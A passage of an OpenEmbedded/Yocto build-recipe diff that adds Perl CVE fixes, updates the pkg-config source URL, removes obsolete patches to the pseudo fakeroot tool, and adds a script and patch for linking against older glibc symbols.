BBCLASSEXTEND="native nativesdk"
diff --git a/meta/recipes-devtools/perl/perl_5.30.1.bb b/meta/recipes-devtools/perl/perl_5.30.1.bb
index b53aff1216..bf81a023b8 100644
--- a/meta/recipes-devtools/perl/perl_5.30.1.bb
+++ b/meta/recipes-devtools/perl/perl_5.30.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Perl scripting language"
HOMEPAGE = "http://www.perl.org/"
+DESCRIPTION = "Perl is a highly capable, feature-rich programming language"
SECTION = "devel"
LICENSE = "Artistic-1.0 | GPL-1.0+"
LIC_FILES_CHKSUM = "file://Copying;md5=5b122a36d0f6dc55279a0ebc69f3c60b \
@@ -28,6 +29,8 @@ SRC_URI = "https://www.cpan.org/src/5.0/perl-${PV}.tar.gz;name=perl \
file://CVE-2020-10878_1.patch \
file://CVE-2020-10878_2.patch \
file://CVE-2020-12723.patch \
+ file://CVE-2023-31484.patch \
+ file://CVE-2023-47038.patch \
"
SRC_URI_append_class-native = " \
file://perl-configpm-switch.patch \
@@ -43,6 +46,10 @@ SRC_URI[perl-cross.sha256sum] = "edce0b0c2f725e2db3f203d6d8e9f3f7161256f5d159055
S = "${WORKDIR}/perl-${PV}"
+# This is a Windows-only issue.
+# https://ubuntu.com/security/CVE-2023-47039
+CVE_CHECK_WHITELIST += "CVE-2023-47039"
+
inherit upstream-version-is-even update-alternatives
DEPENDS += "zlib virtual/crypt"
@@ -146,8 +153,9 @@ do_install() {
install lib/ExtUtils/typemap ${D}${libdir}/perl5/${PV}/ExtUtils/
# Fix up shared library
- rm ${D}/${libdir}/perl5/${PV}/*/CORE/libperl.so
- ln -sf ../../../../libperl.so.${PERL_LIB_VER} $(echo ${D}/${libdir}/perl5/${PV}/*/CORE)/libperl.so
+ dir=$(echo ${D}/${libdir}/perl5/${PV}/*/CORE)
+ rm $dir/libperl.so
+ ln -sf ../../../../libperl.so.${PERL_LIB_VER} $dir/libperl.so
}
do_install_append_class-target() {
diff --git a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
index 52ef2a9779..7bf68082b2 100644
--- a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
+++ b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRCREV = "edf8e6f0ea77ede073f07bff0d2ae1fc7a38103b"
PV = "0.29.2+git${SRCPV}"
-SRC_URI = "git://anongit.freedesktop.org/pkg-config \
+SRC_URI = "git://gitlab.freedesktop.org/pkg-config/pkg-config.git;branch=master;protocol=https \
file://pkg-config-esdk.in \
file://pkg-config-native.in \
file://fix-glib-configure-libtool-usage.patch \
diff --git a/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch b/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch
deleted file mode 100644
index f01e699de7..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From 4e41a05de1f34ba00a68ca4f20fb49c4d1cbd2d0 Mon Sep 17 00:00:00 2001
-From: Richard Purdie <richard.purdie@linuxfoundation.org>
-Date: Wed, 6 Nov 2019 12:17:46 +0000
-Subject: [PATCH] Add statx glibc/syscall support
-
-Modern distros (e.g. fedora30) are starting to use the new statx() syscall through
-the newly exposed glibc wrapper function in software like coreutils (e.g. the ls
-command). Add support to intercept this to pseudo.
-
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-Upstream-Status: Submitted [Emailed to seebs]
----
- ports/linux/guts/statx.c | 48 ++++++++++++++++++++++++++++++++++++++++
- ports/linux/portdefs.h | 1 +
- ports/linux/wrapfuncs.in | 1 +
- 3 files changed, 50 insertions(+)
- create mode 100644 ports/linux/guts/statx.c
-
-diff --git a/ports/linux/statx/guts/statx.c b/ports/linux/statx/guts/statx.c
-new file mode 100644
-index 0000000..a3259c4
---- /dev/null
-+++ b/ports/linux/statx/guts/statx.c
-@@ -0,0 +1,42 @@
-+/*
-+ * Copyright (c) 2019 Linux Foundation
-+ * Author: Richard Purdie
-+ *
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ * int
-+ * statx(int dirfd, const char *pathname, int flags, unsigned int mask, struct statx *statxbuf) {
-+ * int rc = -1;
-+ */
-+ pseudo_msg_t *msg;
-+ PSEUDO_STATBUF buf;
-+ int save_errno;
-+
-+ rc = real_statx(dirfd, pathname, flags, mask, statxbuf);
-+ save_errno = errno;
-+ if (rc == -1) {
-+ return rc;
-+ }
-+
-+ buf.st_uid = statxbuf->stx_uid;
-+ buf.st_gid = statxbuf->stx_gid;
-+ buf.st_dev = makedev(statxbuf->stx_dev_major, statxbuf->stx_dev_minor);
-+ buf.st_ino = statxbuf->stx_ino;
-+ buf.st_mode = statxbuf->stx_mode;
-+ buf.st_rdev = makedev(statxbuf->stx_rdev_major, statxbuf->stx_rdev_minor);
-+ buf.st_nlink = statxbuf->stx_nlink;
-+ msg = pseudo_client_op(OP_STAT, 0, -1, dirfd, pathname, &buf);
-+ if (msg && msg->result == RESULT_SUCCEED) {
-+ pseudo_debug(PDBGF_FILE, "statx(path %s), flags %o, stat rc %d, stat uid %o\n", pathname, flags, rc, statxbuf->stx_uid);
-+ statxbuf->stx_uid = msg->uid;
-+ statxbuf->stx_gid = msg->gid;
-+ statxbuf->stx_mode = msg->mode;
-+ statxbuf->stx_rdev_major = major(msg->rdev);
-+ statxbuf->stx_rdev_minor = minor(msg->rdev);
-+ } else {
-+ pseudo_debug(PDBGF_FILE, "statx(path %s) failed, flags %o, stat rc %d, stat uid %o\n", pathname, flags, rc, statxbuf->stx_uid);
-+ }
-+ errno = save_errno;
-+/* return rc;
-+ * }
-+ */
-diff --git a/ports/linux/statx/portdefs.h b/ports/linux/statx/portdefs.h
-new file mode 100644
-index 0000000..bf934dc
---- /dev/null
-+++ b/ports/linux/statx/portdefs.h
-@@ -0,0 +1,6 @@
-+/*
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ */
-+#include <sys/stat.h>
-+#include <sys/sysmacros.h>
-diff --git a/ports/linux/statx/wrapfuncs.in b/ports/linux/statx/wrapfuncs.in
-new file mode 100644
-index 0000000..c9cd4c3
---- /dev/null
-+++ b/ports/linux/statx/wrapfuncs.in
-@@ -0,0 +1 @@
-+int statx(int dirfd, const char *pathname, int flags, unsigned int mask, struct statx *statxbuf);
-diff --git a/ports/linux/subports b/ports/linux/subports
-index a29044a..49081bf 100755
---- a/ports/linux/subports
-+++ b/ports/linux/subports
-@@ -54,3 +54,13 @@ else
- fi
- rm -f dummy.c dummy.o
-
-+cat > dummy.c <<EOF
-+#define _GNU_SOURCE
-+#include <sys/stat.h>
-+struct statx x;
-+EOF
-+if ${CC} -c -o dummy.o dummy.c >/dev/null 2>&1; then
-+ echo "linux/statx"
-+fi
-+rm -f dummy.c dummy.o
-+
---
-2.17.1
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch b/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch
deleted file mode 100644
index b2dbdad278..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From dbd34b1b2af8fbf44a0d5c37abe3448405819823 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Wed, 28 Aug 2019 19:20:29 +0200
-Subject: [PATCH] maketables/wrappers: use Python 3
-
-Changelog indicates they should be compatible.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- maketables | 2 +-
- makewrappers | 2 +-
- 2 files changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/maketables b/maketables
-index a211772..52285e2 100755
---- a/maketables
-+++ b/maketables
-@@ -1,4 +1,4 @@
--#!/usr/bin/env python
-+#!/usr/bin/env python3
- #
- # Copyright (c) 2008-2010, 2013 Wind River Systems, Inc.
- #
-diff --git a/makewrappers b/makewrappers
-index e84607d..b34f7eb 100755
---- a/makewrappers
-+++ b/makewrappers
-@@ -1,4 +1,4 @@
--#!/usr/bin/env python
-+#!/usr/bin/env python3
- #
- # Copyright (c) 2008-2011,2013 Wind River Systems, Inc.
- #
diff --git a/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch b/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch
deleted file mode 100644
index 9c49e33b02..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From b0902e36108b49e6bc88d6b251cc2f8cffcd5a13 Mon Sep 17 00:00:00 2001
-From: Ricardo Ribalda <ricardo@ribalda.com>
-Date: Sun, 5 Apr 2020 11:40:30 +0000
-Subject: [PATCH] pseudo: On a DB fixup remove files that do not exist anymore
-
-If the user decides to fix a database, remove the files that do not
-exist anymore.
-If only DB test is selected do not change the behaviour (return error).
-
-Signed-off-by: Ricardo Ribalda <ricardo@ribalda.com>
-Upstream-Status: Submitted [https://lists.openembedded.org/g/openembedded-core/message/137045]
----
- pseudo.c | 13 ++++++++++---
- 1 file changed, 10 insertions(+), 3 deletions(-)
-
-diff --git a/pseudo.c b/pseudo.c
-index 0f5850e..98e5b0c 100644
---- a/pseudo.c
-+++ b/pseudo.c
-@@ -1087,9 +1087,15 @@ pseudo_db_check(int fix) {
- int fixup_needed = 0;
- pseudo_debug(PDBGF_DB, "Checking <%s>\n", m->path);
- if (lstat(m->path, &buf)) {
-- errors = EXIT_FAILURE;
-- pseudo_diag("can't stat <%s>\n", m->path);
-- continue;
-+ if (!fix) {
-+ pseudo_diag("can't stat <%s>\n", m->path);
-+ errors = EXIT_FAILURE;
-+ continue;
-+ } else {
-+ pseudo_debug(PDBGF_DB, "can't stat <%s>\n", m->path);
-+ fixup_needed = 2;
-+ goto do_fixup;
-+ }
- }
- /* can't check for device type mismatches, uid/gid, or
- * permissions, because those are the very things we
-@@ -1125,6 +1131,7 @@ pseudo_db_check(int fix) {
- S_ISDIR(m->mode));
- fixup_needed = 2;
- }
-+ do_fixup:
- if (fixup_needed) {
- /* in fixup mode, either delete (mismatches) or
- * correct (dev/ino).
---
-2.21.1
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch b/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch
deleted file mode 100644
index 33d4ef3b2f..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From a491aececfedf7313d29b80d626e0964fb533548 Mon Sep 17 00:00:00 2001
-From: Jacob Kroon <jacob.kroon@gmail.com>
-Date: Sun, 3 May 2020 06:24:03 +0200
-Subject: [PATCH] pseudo_ipc.h: Fix enum typedef
-
-'pseudo_access_t' is a type, so use typedef.
-
-Fixes building pseudo with gcc 10 where -fno-common is the default.
-
-Signed-off-by: Jacob Kroon <jacob.kroon@gmail.com>
-Upstream-Status: Submitted [https://lists.openembedded.org/g/openembedded-core/message/137758]
----
- pseudo_ipc.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/pseudo_ipc.h b/pseudo_ipc.h
-index caeae5c..d945257 100644
---- a/pseudo_ipc.h
-+++ b/pseudo_ipc.h
-@@ -29,7 +29,7 @@ typedef struct {
- char path[];
- } pseudo_msg_t;
-
--enum {
-+typedef enum {
- PSA_EXEC = 1,
- PSA_WRITE = (PSA_EXEC << 1),
- PSA_READ = (PSA_WRITE << 1),
---
-2.26.2
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch b/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch
deleted file mode 100644
index 17829ef3ac..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 86c9a5610e3333ad6aaadb1ac1e8b5a2c948d119 Mon Sep 17 00:00:00 2001
-From: Robert Yang <liezhi.yang@windriver.com>
-Date: Mon, 25 Nov 2019 18:46:45 +0800
-Subject: [PATCH] realpath.c: Remove trailing slashes
-
-Linux system's realpath() remove trailing slashes, but pseudo's doesn't, need
-make them identical.
-
-E.g., the following code (rel.c) prints '/tmp' with system's realpath, but
-pseudo's realpath prints '/tmp/':
-
- #include <stdio.h>
- #include <limits.h>
- #include <stdlib.h>
-
- int main() {
- char out[PATH_MAX];
- printf("%s\n", realpath("/tmp/", out));
- return 0;
- }
-
-$ bitbake base-passwd -cdevshell # For pseudo env
-$ gcc rel.c
-$ ./a.out
-/tmp/ (but should be /tmp)
-
-This patch fixes the problem.
-
-Upstream-Status: Submitted [https://lists.yoctoproject.org/g/poky/message/11879]
-
-Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
----
- ports/unix/guts/realpath.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/ports/unix/guts/realpath.c b/ports/unix/guts/realpath.c
---- a/ports/unix/guts/realpath.c
-+++ b/ports/unix/guts/realpath.c
-@@ -14,7 +14,14 @@
- errno = ENAMETOOLONG;
- return NULL;
- }
-- if ((len = strlen(rname)) >= pseudo_sys_path_max()) {
-+ len = strlen(rname);
-+ char *ep = rname + len - 1;
-+ while (ep > rname && *ep == '/') {
-+ --len;
-+ *(ep--) = '\0';
-+ }
-+
-+ if (len >= pseudo_sys_path_max()) {
- errno = ENAMETOOLONG;
- return NULL;
- }
---
-2.7.4
-
diff --git a/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch b/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch
deleted file mode 100644
index 161357d553..0000000000
--- a/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 93d95ed2eaedcca110c214e1fe3f8896b1f6f853 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Tue, 17 Dec 2019 20:24:27 +0100
-Subject: [PATCH] xattr: adjust for attr 2.4.48 release
-
-Latest versions of attr have removed the xattr.h header,
-with the rationale that libc is providing the same wrappers.
-
-attr/attributes.h is providing the ENOATTR definition.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- ports/linux/subports | 5 +++--
- ports/linux/xattr/portdefs.h | 3 ++-
- 2 files changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/ports/linux/subports b/ports/linux/subports
-index 2c43ac9..740ec83 100755
---- a/ports/linux/subports
-+++ b/ports/linux/subports
-@@ -29,11 +29,12 @@ fi
- if $port_xattr; then
- cat > dummy.c <<EOF
- #include <sys/types.h>
--#include <attr/xattr.h>
-+#include <sys/xattr.h>
-+#include <attr/attributes.h>
- int i;
- EOF
- if ! ${CC} -c -o dummy.o dummy.c >/dev/null 2>&1; then
-- echo >&2 "Warning: Can't compile trivial program using <attr/xattr.h>".
-+ echo >&2 "Warning: Can't compile trivial program using <attr/attributes.h>".
- echo >&2 " xattr support will require that header."
- fi
- echo "linux/xattr"
-diff --git a/ports/linux/xattr/portdefs.h b/ports/linux/xattr/portdefs.h
-index 56cd3ca..068d39a 100644
---- a/ports/linux/xattr/portdefs.h
-+++ b/ports/linux/xattr/portdefs.h
-@@ -2,5 +2,6 @@
- * SPDX-License-Identifier: LGPL-2.1-only
- *
- */
--#include <attr/xattr.h>
-+#include <sys/xattr.h>
-+#include <attr/attributes.h>
- #include <stdint.h>
diff --git a/meta/recipes-devtools/pseudo/files/build-oldlibc b/meta/recipes-devtools/pseudo/files/build-oldlibc
new file mode 100755
index 0000000000..85c438de4e
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/build-oldlibc
@@ -0,0 +1,20 @@
+#!/bin/sh
+#
+# Script to re-generate pseudo-prebuilt-2.33.tar.xz
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+for i in x86_64 aarch64 i686; do
+ if [ ! -e $i-nativesdk-libc.tar.xz ]; then
+ wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz
+ fi
+ tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\*
+ cd $i-linux/lib
+ ln -s libdl.so.2 libdl.so
+ ln -s libpthread.so.0 libpthread.so
+ cd ../..
+done
+tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux
\ No newline at end of file
diff --git a/meta/recipes-devtools/pseudo/files/moreretries.patch b/meta/recipes-devtools/pseudo/files/moreretries.patch
deleted file mode 100644
index adea2665b0..0000000000
--- a/meta/recipes-devtools/pseudo/files/moreretries.patch
+++ /dev/null
@@ -1,19 +0,0 @@
-Increase the number of retries in pseudo due to occasional slow
-server shutdowns.
-
-Upstream-Status: Pending
-RP 2016/2/28
-
-Index: git/pseudo_client.c
-===================================================================
---- git.orig/pseudo_client.c
-+++ git/pseudo_client.c
-@@ -1282,7 +1282,7 @@ pseudo_client_setup(void) {
- }
- }
-
--#define PSEUDO_RETRIES 20
-+#define PSEUDO_RETRIES 250
- static pseudo_msg_t *
- pseudo_client_request(pseudo_msg_t *msg, size_t len, const char *path) {
- pseudo_msg_t *response = 0;
diff --git a/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
new file mode 100644
index 0000000000..c453b5f735
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
@@ -0,0 +1,57 @@
+If we link against a newer glibc (2.34) and our LD_PRELOAD library is then run against
+a binary on a host with an older libc, we see symbol errors, since in glibc 2.34 pthread
+and dl are merged into libc itself.
+
+We need to use the older form of linking so use glibc binaries from an older release
+to force this. We only use minimal symbols from these anyway.
+
+pthread_atfork is problematic, particularly on arm so use the internal glibc routine
+it maps too. This was always present in the main libc from 2.3.2 onwards.
+
+Yes this is horrible. Better solutions welcome.
+
+There is more info in the bug: [YOCTO #14521]
+
+Upstream-Status: Inappropriate [this patch is native and nativesdk]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Tweak library search order, make prebuilt lib ahead of recipe lib
+Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+---
+ Makefile.in | 2 +-
+ pseudo_wrappers.c | 5 ++++-
+ 2 files changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile.in b/Makefile.in
+--- a/Makefile.in
++++ b/Makefile.in
+@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN)
+ libpseudo: $(LIBPSEUDO)
+
+ $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB)
+- $(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
++ $(CC) $(CFLAGS) -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
+ pseudo_client.o pseudo_ipc.o \
+ $(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS)
+
+diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c
+--- a/pseudo_wrappers.c
++++ b/pseudo_wrappers.c
+@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void)
+ pseudo_mutex_holder = 0;
+ }
+
++extern void *__dso_handle;
++extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *);
++
+ static void
+ _libpseudo_init(void) {
+ if (!_libpseudo_initted)
+- pthread_atfork(NULL, NULL, libpseudo_atfork_child);
++ __register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle);
+
+ pseudo_getlock();
+ pseudo_antimagic();
+--
+2.27.0
+
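
The pseudo_wrappers.c hunk above swaps the public pthread_atfork() for glibc's internal __register_atfork() so libpseudo avoids a separate libpthread symbol dependency on older hosts. A small sketch of what the registered child handler accomplishes, written against the public API; this is illustrative and is not pseudo's actual lock handling:

    /*
     * Sketch: after fork(), the child resets its lock state so it does not
     * inherit a mutex that some other thread held in the parent.
     */
    #include <pthread.h>
    #include <stdio.h>
    #include <sys/wait.h>
    #include <unistd.h>

    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

    static void atfork_child(void)
    {
        /* Reinitialize rather than unlock: the child never took the lock itself. */
        pthread_mutex_t fresh = PTHREAD_MUTEX_INITIALIZER;
        lock = fresh;
    }

    int main(void)
    {
        pthread_atfork(NULL, NULL, atfork_child);
        pid_t pid = fork();
        if (pid == 0) {
            pthread_mutex_lock(&lock);   /* safe: state was reset in the child */
            pthread_mutex_unlock(&lock);
            _exit(0);
        }
        waitpid(pid, NULL, 0);
        puts("child exited cleanly");
        return 0;
    }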
diff --git a/meta/recipes-devtools/pseudo/files/seccomp.patch b/meta/recipes-devtools/pseudo/files/seccomp.patch
deleted file mode 100644
index 283f997941..0000000000
--- a/meta/recipes-devtools/pseudo/files/seccomp.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-Pseudo changes the syscall access patterns which makes it incompatible with
-seccomp. Therefore intercept the seccomp syscall and alter it, pretending that
-seccomp was setup when in fact we do nothing. If we error as unsupported,
-utilities like file will exit with errors so we can't just disable it.
-
-Upstream-Status: Pending
-RP 2020/4/3
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-
-It fails to compile pseudo-native on centos 7:
-
-| ports/linux/pseudo_wrappers.c: In function ‘prctl’:
-| ports/linux/pseudo_wrappers.c:129:14: error: ‘SECCOMP_SET_MODE_FILTER’ undeclared (first use in this function)
-| if (cmd == SECCOMP_SET_MODE_FILTER) {
-| ^
-
-Add macro guard for seccomp to avoid the failure.
-
-Signed-off-by: Kai Kang <kai.kang@windriver.com>
-
-Index: git/ports/linux/pseudo_wrappers.c
-===================================================================
---- git.orig/ports/linux/pseudo_wrappers.c
-+++ git/ports/linux/pseudo_wrappers.c
-@@ -57,6 +57,7 @@ int pseudo_capset(cap_user_header_t hdrp
- long
- syscall(long number, ...) {
- long rc = -1;
-+ va_list ap;
-
- if (!pseudo_check_wrappers() || !real_syscall) {
- /* rc was initialized to the "failure" value */
-@@ -77,6 +78,20 @@ syscall(long number, ...) {
- (void) number;
- #endif
-
-+#ifdef SYS_seccomp
-+ /* pseudo and seccomp are incompatible as pseudo uses different syscalls
-+ * so pretend to enable seccomp but really do nothing */
-+ if (number == SYS_seccomp) {
-+ unsigned long cmd;
-+ va_start(ap, number);
-+ cmd = va_arg(ap, unsigned long);
-+ va_end(ap);
-+ if (cmd == SECCOMP_SET_MODE_FILTER) {
-+ return 0;
-+ }
-+ }
-+#endif
-+
- /* gcc magic to attempt to just pass these args to syscall. we have to
- * guess about the number of args; the docs discuss calling conventions
- * up to 7, so let's try that?
-@@ -92,3 +108,44 @@ static long wrap_syscall(long nr, va_lis
- (void) ap;
- return -1;
- }
-+
-+int
-+prctl(int option, ...) {
-+ int rc = -1;
-+ va_list ap;
-+
-+ if (!pseudo_check_wrappers() || !real_prctl) {
-+ /* rc was initialized to the "failure" value */
-+ pseudo_enosys("prctl");
-+ return rc;
-+ }
-+
-+#ifdef SECCOMP_SET_MODE_FILTER
-+ /* pseudo and seccomp are incompatible as pseudo uses different syscalls
-+ * so pretend to enable seccomp but really do nothing */
-+ if (option == PR_SET_SECCOMP) {
-+ unsigned long cmd;
-+ va_start(ap, option);
-+ cmd = va_arg(ap, unsigned long);
-+ va_end(ap);
-+ if (cmd == SECCOMP_SET_MODE_FILTER) {
-+ return 0;
-+ }
-+ }
-+#endif
-+
-+ /* gcc magic to attempt to just pass these args to prctl. we have to
-+ * guess about the number of args; the docs discuss calling conventions
-+ * up to 5, so let's try that?
-+ */
-+ void *res = __builtin_apply((void (*)()) real_prctl, __builtin_apply_args(), sizeof(long) * 5);
-+ __builtin_return(res);
-+}
-+
-+/* unused.
-+ */
-+static int wrap_prctl(int option, va_list ap) {
-+ (void) option;
-+ (void) ap;
-+ return -1;
-+}
-Index: git/ports/linux/guts/prctl.c
-===================================================================
---- /dev/null
-+++ git/ports/linux/guts/prctl.c
-@@ -0,0 +1,15 @@
-+/*
-+ * Copyright (c) 2020 Richard Purdie
-+ *
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ * int prctl(int option, ...)
-+ * int rc = -1;
-+ */
-+
-+ /* we should never get here, prctl is hand-wrapped */
-+ rc = -1;
-+
-+/* return rc;
-+ * }
-+ */
-Index: git/ports/linux/portdefs.h
-===================================================================
---- git.orig/ports/linux/portdefs.h
-+++ git/ports/linux/portdefs.h
-@@ -32,3 +32,5 @@ GLIBC_COMPAT_SYMBOL(memcpy,2.0);
-
- #include <linux/capability.h>
- #include <sys/syscall.h>
-+#include <sys/prctl.h>
-+#include <linux/seccomp.h>
-Index: git/ports/linux/wrapfuncs.in
-===================================================================
---- git.orig/ports/linux/wrapfuncs.in
-+++ git/ports/linux/wrapfuncs.in
-@@ -56,3 +56,4 @@ int getgrent_r(struct group *gbuf, char
- int capset(cap_user_header_t hdrp, const cap_user_data_t datap); /* real_func=pseudo_capset */
- long syscall(long nr, ...); /* hand_wrapped=1 */
- int renameat2(int olddirfd, const char *oldpath, int newdirfd, const char *newpath, unsigned int flags); /* flags=AT_SYMLINK_NOFOLLOW */
-+int prctl(int option, ...); /* hand_wrapped=1 */
diff --git a/meta/recipes-devtools/pseudo/files/toomanyfiles.patch b/meta/recipes-devtools/pseudo/files/toomanyfiles.patch
deleted file mode 100644
index bda7e4b202..0000000000
--- a/meta/recipes-devtools/pseudo/files/toomanyfiles.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From b0b25fbc041a148d1de09f5a6503cd95973ec77c Mon Sep 17 00:00:00 2001
-From: Richard Purdie <richard.purdie@linuxfoundation.org>
-Date: Tue, 25 Apr 2017 15:25:54 +0100
-Subject: [PATCH 3/3] pseudo: Handle too many files deadlock
-
-Currently if we max out the maximum number of files, pseudo can deadlock, unable to
-accept new connections yet unable to move forward and unblock the other processes
-waiting either.
-
-Rather than hang, when this happens, close out inactive connections, allowing us
-to accept the new ones. The disconnected clients will simply reconnect. There is
-a small risk of data loss here sadly but its better than hanging.
-
-RP
-2017/4/25
-
-Upstream-Status: Submitted [Peter is aware of the issue]
-
----
- pseudo_server.c | 10 ++++++++++
- 1 file changed, 10 insertions(+)
-
-diff --git a/pseudo_server.c b/pseudo_server.c
-index dac3258..15a3e8f 100644
---- a/pseudo_server.c
-+++ b/pseudo_server.c
-@@ -802,6 +802,7 @@ pseudo_server_loop(void) {
- struct sigaction eat_usr2 = {
- .sa_handler = set_do_list_clients
- };
-+ int hitmaxfiles;
-
- clients = malloc(16 * sizeof(*clients));
-
-@@ -820,6 +821,7 @@ pseudo_server_loop(void) {
- active_clients = 1;
- max_clients = 16;
- highest_client = 0;
-+ hitmaxfiles = 0;
-
- pseudo_debug(PDBGF_SERVER, "server loop started.\n");
- if (listen_fd < 0) {
-@@ -878,10 +880,15 @@ pseudo_server_loop(void) {
- } else {
- serve_client(i);
- }
-+ } else if (hitmaxfiles) {
-+ /* Only close one per loop iteration in the interests of caution */
-+ close_client(i);
-+ hitmaxfiles = 0;
- }
- if (die_forcefully)
- break;
- }
-+ hitmaxfiles = 0;
- if (!die_forcefully &&
- (FD_ISSET(clients[0].fd, &events) ||
- FD_ISSET(clients[0].fd, &reads))) {
-@@ -903,6 +910,9 @@ pseudo_server_loop(void) {
- */
- pseudo_server_timeout = DEFAULT_PSEUDO_SERVER_TIMEOUT;
- die_peacefully = 0;
-+ } else if (errno == EMFILE) {
-+ hitmaxfiles = 1;
-+ pseudo_debug(PDBGF_SERVER, "Hit max open files, dropping a client.\n");
- }
- }
- pseudo_debug(PDBGF_SERVER, "server loop complete [%d clients left]\n", active_clients);
---
-2.15.1
-
diff --git a/meta/recipes-devtools/pseudo/files/xattr_version.patch b/meta/recipes-devtools/pseudo/files/xattr_version.patch
deleted file mode 100644
index a8b14bdd69..0000000000
--- a/meta/recipes-devtools/pseudo/files/xattr_version.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-On a tumbleweed system, "install X Y" was showing the error:
-
-pseudo: ENOSYS for 'fsetxattr'.
-
-which was being caused by dlsym() for that function returning NULL. This
-appears to be due to it finding an unresolved symbol in libacl for this
-symbol in libattr. It hasn't been resolved so its NULL. dlerror() returns
-nothing since this is a valid symbol entry, its just not the one we want.
-
-We can add the glibc version string for the symbol we actually want so we get
-that version rather than the libattr/libacl one.
-
-To quote libattr:
-"""
- These dumb wrappers are for backwards compatibility only.
- Actual syscall wrappers are long gone to libc.
-"""
-and they are simply wrappers around the libc version so our attaching
-to the libc versions should intercept any accesses via these too.
-
-RP 2020/06/22
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org
-Upstream-Status: Pending [discussed with seebs on irc and appears the correct fix]
-
-
-Index: git/ports/linux/xattr/wrapfuncs.in
-===================================================================
---- git.orig/ports/linux/xattr/wrapfuncs.in
-+++ git/ports/linux/xattr/wrapfuncs.in
-@@ -1,12 +1,12 @@
